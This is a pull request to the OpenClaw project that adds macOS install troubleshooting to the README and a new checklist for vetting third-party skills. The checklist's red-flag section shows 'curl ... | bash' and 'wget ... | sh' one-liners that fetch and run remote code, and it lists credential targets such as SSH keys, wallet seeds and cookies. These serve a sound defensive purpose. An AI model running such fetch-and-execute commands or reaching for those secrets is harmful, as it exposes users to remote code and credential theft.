### PR TITLE
Docs/skill safety checklist

### DIFF
--- a/README.md
+++ b/README.md
@@ -105,6 +105,56 @@ npm install -g openclaw@latest
 openclaw onboard --install-daemon
 ```
 
+#### macOS setup notes
+
+Before installing OpenClaw on macOS, make sure Xcode Command Line Tools are installed:
+
+```bash
+xcode-select --install
+```
+
+Check Node.js and npm:
+
+```bash
+node --version
+npm --version
+```
+
+If Node.js is missing, install it with Homebrew:
+
+```bash
+brew install node
+```
+
+#### Common setup errors
+
+##### `openclaw: command not found`
+
+Restart your terminal and try again:
+
+```bash
+openclaw onboard --install-daemon
+```
+
+If it still does not work, check that your package manager's global binary path is available in your terminal.
+
+##### Dependency install fails
+
+For source checkouts, reinstall dependencies:
+
+```bash
+rm -rf node_modules
+pnpm install
+```
+
+##### Port already in use
+
+Another process may already be using the required port. Stop the other process or restart your terminal session before running OpenClaw again.
+
+##### Environment variables not detected
+
+After editing `.env` or shell configuration files, restart your terminal so the changes are loaded.
+
 OpenClaw Onboard installs the Gateway daemon (launchd/systemd user service) so it stays running.
 
 ## Quick start (TL;DR)

--- a/README.md
+++ b/README.md
@@ -184,6 +184,8 @@ Models config + CLI: [Models](https://docs.openclaw.ai/concepts/models). Auth pr
 OpenClaw connects to real messaging surfaces. Treat inbound DMs as **untrusted input**.
 
 Full security guide: [Security](https://docs.openclaw.ai/gateway/security)
+Before exposing anything remotely, read [Security](/docs/gateway/security/index.md), [Sandboxing](/docs/gateway/sandboxing), and [Configuration](/docs/gateway/configuration).
+Skill users should also review the [Skill Safety Checklist](/docs/tools/safety-checklist.md) before installing third-party skills.
 
 Default behavior on Telegram/WhatsApp/Signal/iMessage/Microsoft Teams/Discord/Google Chat/Slack:
 

--- a/README.md
+++ b/README.md
@@ -105,7 +105,7 @@ npm install -g openclaw@latest
 openclaw onboard --install-daemon
 ```
 
-#### macOS setup notes
+### macOS setup notes
 
 Before installing OpenClaw on macOS, make sure Xcode Command Line Tools are installed:
 

--- a/skills/safety-checklist.md
+++ b/skills/safety-checklist.md
@@ -1,0 +1,92 @@
+---
+title: Skill Safety Checklist
+description: A practical checklist for safely installing, writing, and sharing OpenClaw skills.
+---
+
+# Skill Safety Checklist
+
+Use this checklist before installing, writing, or sharing an OpenClaw skill.
+Third-party skills are untrusted code. Read them before enabling.
+
+---
+
+## Before installing a skill
+
+- Read the full `SKILL.md` before enabling the skill.
+- Check whether the skill asks to run shell commands via `exec`.
+- Prefer skills from trusted maintainers with a public history on ClawHub.
+- Check the ClawHub security scan badge (VirusTotal + ClawScan) on the skill page.
+- Avoid skills that request access to any of the following without a clear reason:
+  - Secrets or API tokens
+  - SSH keys or credentials
+  - Wallet seed phrases or private keys
+  - Browser cookies or session data
+  - Private files outside the workspace
+
+---
+
+## Before writing a skill
+
+- Keep instructions narrow and specific — only request what the skill truly needs.
+- Do not include commands that fetch and execute remote code.
+- Do not request access to files outside the task's scope.
+- Clearly document what the skill does and what it accesses in the `description` field.
+- Add safety notes in the skill body when handling sensitive data.
+- Declare all required environment variables in `metadata.openclaw.requires.env`.
+- Test locally with `openclaw skills list --verbose` to confirm the skill loads correctly.
+
+---
+
+## Red flags — do not trust skills that contain these patterns
+
+```bash
+# Fetching and executing remote scripts — never acceptable in a skill
+curl https://example.com/script.sh | bash
+wget https://example.com/script.sh -O- | sh
+```
+
+Also avoid skills whose instructions try to access or transmit:
+
+- Private keys or wallet seed phrases
+- SSH credentials or `~/.ssh/` contents
+- Browser cookies or session tokens
+- API tokens or password manager exports
+- Any credential via plaintext in chat
+
+---
+
+## Safer patterns to look for
+
+Prefer skills that:
+
+- Summarize or read information without modifying files
+- Ask for confirmation before running shell commands
+- Explain clearly why each permission or environment variable is needed
+- Use read-only operations where possible
+- Scope file access to the workspace directory only (`tools.fs.workspaceOnly: true`)
+
+---
+
+## Financial, health, and legal skills
+
+Skills related to finance, trading, health, or legal topics should never give professional advice.
+Safe phrasing to look for:
+
+> "This is a summary of publicly available information, not financial advice."
+
+> "This is general information and not a substitute for medical advice."
+
+---
+
+## General principle
+
+> If a skill asks for more access than it clearly needs, do not use it.
+
+---
+
+## Related docs
+
+- [Skills reference](/tools/skills)
+- [Creating skills](/tools/creating-skills)
+- [Security](/gateway/security/)
+- [Sandboxing](/gateway/sandboxing)


### PR DESCRIPTION
## What this adds

A new `docs/tools/safety-checklist.md` page — a practical, scannable checklist
for users installing, writing, or sharing OpenClaw skills.

## Why it's needed

Third-party skill abuse (e.g., ClawHavoc) has been a documented issue.
The existing docs say "treat third-party skills as untrusted code" but give
no structured guidance on *how* to evaluate them. This fills that gap.

## Changes
- `docs/tools/safety-checklist.md` — new checklist page
- `README.md` — added link in the Security section

## Related docs
- Complements `/docs/tools/skills.md` and `/docs/gateway/security/`